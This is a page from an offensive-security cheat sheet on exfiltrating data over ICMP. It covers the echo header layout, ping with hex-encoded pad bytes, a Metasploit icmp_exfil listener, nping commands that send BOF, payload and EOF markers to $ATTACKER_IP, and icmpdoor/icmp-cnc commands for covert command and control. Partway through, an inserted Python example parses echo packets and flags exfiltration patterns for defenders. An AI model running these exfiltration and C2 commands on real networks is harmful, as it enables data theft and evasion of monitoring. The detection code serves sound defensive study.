killchain-compendium/Exfiltration/ICMP.md

ICMP Exfiltration

  • ICMP Types

  • Type 0, Echo Reply, carries an optional Data field after the fixed header fields (Type, Code, Checksum, Identifier, Sequence Number), as shown below

 0                   1                   2                   3  
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|      Type     |      Code     |            Checksum           |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Identifier          |        Sequence Number        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
+                              Data                             +
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Usage

  • The -p (pattern) parameter of ping can be used to choose the bytes that fill the packet. From the manual:
 -p pattern
           You may specify up to 16 “pad” bytes to fill out the packet you send. This is useful for diagnosing
           data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.
  • Pad bytes given as the hex encoding of the data
ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p)

Metasploit ICMP Exfiltration

  • Waiting for ICMP data on the attacker host
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp and not src $ATTACKER_IP
set interface <interface>
run
  • Exfiltrate from the target with the ping command shown above, or with nping
  • Start the transmission with nping: a BOF marker followed by the file name, then the payload, then an EOF marker
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF"
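The header diagram above and the ping/nping exfiltration flows are both served by one added example below. It is my code, not part of the compendium, Metasploit or nping: a parser for the echo layout in the diagram (with the RFC 1071 checksum recomputed) plus the kind of heuristics a defender can run over captured echo payloads to separate normal ping traffic from data carried in the Data field. The 16-byte timestamp prefix, the 32/56-byte default payload sizes, the BOF/EOF marker strings and the 0.9 printable-ratio threshold are assumptions; every sample packet is constructed inline.

```python
"""Added example (not from the compendium): parse ICMP echo packets laid out
as in the header diagram and flag Data fields that do not look like an OS
ping. All packets below are constructed inline for the demonstration."""
import string
import struct
from dataclasses import dataclass
from typing import Dict, List

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8
TIMESTAMP_LEN = 16                  # assumption: 64-bit iputils ping prefixes Data with a struct timeval
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"   # 32-byte Windows ping default payload
EXFIL_MARKERS = (b"BOF", b"EOF")    # markers from the icmp_exfil flow described above
PRINTABLE = frozenset(string.printable.encode())


def rfc1071_checksum(data: bytes) -> int:
    """Internet checksum: ones' complement of the ones' complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


@dataclass
class IcmpEcho:
    icmp_type: int
    code: int
    checksum: int
    identifier: int
    sequence: int
    data: bytes
    checksum_ok: bool


def parse_icmp_echo(pkt: bytes) -> IcmpEcho:
    """Split the 8-byte echo header of the diagram from the Data field and verify the checksum."""
    if len(pkt) < 8:
        raise ValueError("shorter than the 8-byte echo header")
    icmp_type, code, chksum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    if icmp_type not in (ICMP_ECHO_REPLY, ICMP_ECHO_REQUEST):
        raise ValueError(f"type {icmp_type} is not an echo message")
    ok = rfc1071_checksum(pkt[:2] + b"\x00\x00" + pkt[4:]) == chksum
    return IcmpEcho(icmp_type, code, chksum, ident, seq, pkt[8:], ok)


def build_echo(icmp_type: int, ident: int, seq: int, data: bytes) -> bytes:
    """Build an echo packet with a correct checksum (used only to construct samples)."""
    hdr = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    return struct.pack("!BBHHH", icmp_type, 0, rfc1071_checksum(hdr + data), ident, seq) + data


def is_counting_fill(data: bytes) -> bool:
    """iputils ping fills each Data byte after the timestamp with its own offset (0x10 0x11 ...)."""
    tail = data[TIMESTAMP_LEN:]
    return bool(tail) and tail == bytes((TIMESTAMP_LEN + i) & 0xFF for i in range(len(tail)))


def echo_findings(echo: IcmpEcho) -> List[str]:
    """Return detection findings for one echo message; an empty list means 'looks like plain ping'."""
    findings: List[str] = []
    data = echo.data
    if not echo.checksum_ok:
        findings.append("bad checksum")
    if data == WINDOWS_PING_DATA or is_counting_fill(data):
        return findings
    findings.append("non-default fill pattern")
    if len(data) not in (32, 56):
        findings.append(f"unusual data length {len(data)}")
    for marker in EXFIL_MARKERS:
        if marker in data:
            findings.append(f"marker {marker.decode()} present")
    # Skip the timestamp slot when the payload is long enough to hold one.
    body = data[TIMESTAMP_LEN:] if len(data) > TIMESTAMP_LEN else data
    if body and sum(b in PRINTABLE for b in body) / len(body) > 0.9:
        findings.append("payload is mostly printable text")
    return findings


def scan_samples() -> Dict[str, List[str]]:
    """Constructed samples: two OS defaults, a -p ff ping, a -p hex-of-text ping, and the nping markers."""
    hex_pad = b"data payload\n"                       # what `echo "data payload" | xxd -p` encodes
    samples = {
        "linux_default": b"\x00" * TIMESTAMP_LEN + bytes(range(TIMESTAMP_LEN, 56)),
        "windows_default": WINDOWS_PING_DATA,
        "ping_p_ff": b"\x00" * TIMESTAMP_LEN + b"\xff" * 40,
        "ping_p_hex": b"\x00" * TIMESTAMP_LEN + (hex_pad * 4)[:40],
        "nping_bof": b"BOFpayload.txt",
        "nping_eof": b"EOF",
    }
    packets = {name: build_echo(ICMP_ECHO_REQUEST, 0x1234, i, d) for i, (name, d) in enumerate(samples.items())}
    damaged = bytearray(packets["nping_bof"])
    damaged[-1] ^= 0x01                                # flip one bit so the checksum no longer matches
    packets["corrupted"] = bytes(damaged)
    return {name: echo_findings(parse_icmp_echo(pkt)) for name, pkt in packets.items()}


if __name__ == "__main__":
    for name, found in scan_samples().items():
        print(f"{name:16s} {found or 'ok'}")
```

The two OS defaults produce no findings, so the rule fires only on payloads that deviate from them; in a real sensor the same `echo_findings` logic would be fed from a packet capture rather than from the constructed samples, and the marker list would be extended with whatever strings the tooling in your environment is known to use.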

C2 over ICMP

  • On target
sudo icmpdoor -i <interface> -d $ATTACKER_IP
  • On attacker
sudo icmp-cnc -i <interface> -d $TARGET_IP